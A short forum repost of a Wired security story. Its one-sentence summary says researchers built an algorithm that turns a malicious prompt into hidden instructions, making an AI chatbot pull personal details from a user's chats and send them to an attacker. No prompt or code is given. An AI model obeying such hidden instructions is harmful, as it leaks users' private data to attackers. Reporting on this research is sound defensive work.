National Cyber Warfare Foundation (NCWF) Forums


This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats


0 user ratings
2024-10-17 10:38:23
milo
Privacy
Security researchers created an algorithm that turns a malicious prompt into a set of hidden instructions that could send a user's personal information to an attacker.



Source: wiredsecurity
Source Link: https://www.wired.com/story/ai-imprompter-malware-llm/


Comments
new comment
Nobody has commented yet. Will you be the first?
 
Forum
Privacy



Copyright 2012 through 2024 - National Cyber Warfare Foundation - All rights reserved worldwide.